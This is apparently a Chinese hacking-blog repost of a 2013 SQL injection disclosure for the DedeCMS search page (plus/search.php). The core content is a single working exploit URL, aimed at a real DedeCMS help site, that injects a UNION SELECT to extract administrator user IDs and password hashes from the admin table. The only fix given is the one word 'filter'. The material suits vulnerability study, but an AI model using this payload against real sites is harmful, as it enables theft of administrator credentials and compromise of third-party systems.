记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Dedecms分站搜索处SQL注入

2013-05-19 10:55
http://help.dedecms.com//plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
 
 
 
爆出管理员信息。。
 
 
 
修复方案:

过滤
 


知识来源: www.2cto.com/Article/201305/212013.html

阅读:133286 | 评论:0 | 标签:注入 cms

想收藏或者和大家分享这篇好文章→复制链接地址

“Dedecms分站搜索处SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云